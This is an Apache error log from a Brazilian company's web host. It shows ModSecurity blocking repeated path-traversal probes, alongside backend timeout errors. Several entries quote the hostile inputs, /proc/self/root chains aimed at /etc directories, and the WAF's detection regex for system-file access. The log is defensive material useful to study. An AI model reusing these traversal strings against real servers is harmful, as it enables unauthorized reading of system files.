[Thu Mar 19 03:03:05.137786 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:03:05.283202 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:51556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRmeoXxyEfFpUF8f_R9QAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:03:28.133853 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:03:39.308295 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:58668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuRu9a6ubjKNq_cu4b8VwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:03:47.827398 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.228.61:32822] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuRw-yqAr6etmhZHNokhQAAAEc"]
[Thu Mar 19 03:03:50.149243 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:04:14.125787 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:04:17.147526 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:48868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuR4RkFeYa1D6dYQnCs3AAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:04:26.186787 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.241.31:46016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuR6V_V7PWP6ixUYl58UgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:04:28.214163 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:56660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuR7Pu8EFLIOrSqIptcyQAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:04:43.161812 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:05:09.221790 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:05:19.535484 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:57894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuSHwkwaGbbGflqUZBy8wAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:05:40.759310 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:56670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuSM_u8EFLIOrSqIptdCAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:05:41.133799 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47412] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:06:09.129865 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:06:14.333953 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:40790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuSVuoXxyEfFpUF8f_SbwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:06:32.090591 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.244.43:35736] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuSaPu8EFLIOrSqIptdRAAAAk0"]
[Thu Mar 19 03:06:33.157804 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:06:34.227108 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:38090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuSata6ubjKNq_cu4b8wAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:06:45.859731 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:59792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuSdda6ubjKNq_cu4b8zAAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:06:57.141945 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49436] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:07:19.277821 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:07:41.045858 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:50416] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:08:04.125815 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:08:27.141899 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:08:32.807565 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:46098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuS4OoXxyEfFpUF8f_StwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:08:49.121825 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:08:51.422674 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.228.61:46110] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuS8_u8EFLIOrSqIptd0gAAAkU"]
[Thu Mar 19 03:09:05.884554 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:47678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuTARkFeYa1D6dYQnCtWAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:09:11.037880 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:09:33.121803 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:09:48.804288 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.243.128:57902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuTLF_V7PWP6ixUYl58_QAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:09:55.113273 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:10:19.641784 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:10:43.769789 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:10:50.343884 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:40194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuTaQkwaGbbGflqUZBz-QAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:10:58.936534 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.243.128:60480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuTcv-YZRR_7pZ7nDJOkQAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:11:09.098060 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:11:38.129789 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56430] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:11:42.779790 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.244.43:58076] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuTngkwaGbbGflqUZB0EwAAAMA"]
[Thu Mar 19 03:12:03.133836 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:12:26.125812 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:12:37.556713 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:45682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuT1fu8EFLIOrSqIptedwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:12:42.911219 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:45488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 